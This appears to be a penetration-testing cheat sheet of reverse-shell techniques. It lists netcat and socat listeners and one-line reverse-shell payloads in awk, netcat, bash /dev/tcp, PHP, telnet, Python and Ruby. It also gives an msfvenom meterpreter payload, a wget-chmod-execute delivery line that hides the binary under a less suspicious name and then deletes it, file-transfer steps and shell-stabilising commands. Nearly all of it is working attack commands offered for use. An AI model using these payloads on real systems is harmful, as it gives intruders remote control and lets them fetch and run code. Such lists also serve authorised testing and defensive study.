Reverse Shell
Listenersâ
nc -nlvp <port>
nc -nlvp <port> <<< <cmd>
socat file:`tty`,raw,echo=0 tcp-listen:<port>
socat file:`tty`,echo=0,raw udp-listen:<port>
Payloadsâ
Awkâ
awk 'BEGIN {s = "/inet/tcp/0/<LHOST>/<LPORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Netcatâ
GAPING_SECURITY_HOLE needs to be disabled.
nc <ip> <port> -e /bin/bash
nc <ip> <port> -c /bin/bash
mkfifo + ncâ
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
mknod + ncâ
mknod backpipe p && nc <ip> <port> 0<backpipe | /bin/bash 1>backpipe
TCP socketâ
/bin/bash -i > /dev/tcp/<ip>/<port> 0<&1 2>&1
PHPâ
php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/bash -i <&3 >&3 2>&3");'
Telnetâ
telnet <ip> <port> 0<backpipe | /bin/bash 1>backpipe
Pythonâ
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Socat UDP listener (not tested)
python -c 'import socket,pty,os;lhost = "<ip>"; lport = <port>; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE",'/dev/null'); pty.spawn("/bin/bash"); s.close();
Rubyâ
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Drop a fileâ
Payloadsâ
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=<ip> lport=445 -f elf -o test.elf
Deliveryâ
wget <ip/domain>/test.elf -O /tmp/<less_suspicious_executable_name> && chmod 777 /tmp/<l_s_e_n> && /tmp/<l_s_e_n> && rm /tmp/<l_s_e_n>
Copy (base64)
1)cat file2upload | base64
2)Create the file on the target and copy
2)impacket-smbserver w00t .
3)cat fileWithBase64Content | base64 -d > finalBinary
Interactive reverse shellâ
nc -nlvp <port>
python -c 'import pty; pty.spawn("/bin/bash")'
[CTRL + Z]
echo $TERM
stty -a
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm256-color #according to "echo $TERM"
stty rows 38 columns 116 # according to "stty -a"
stty raw +echo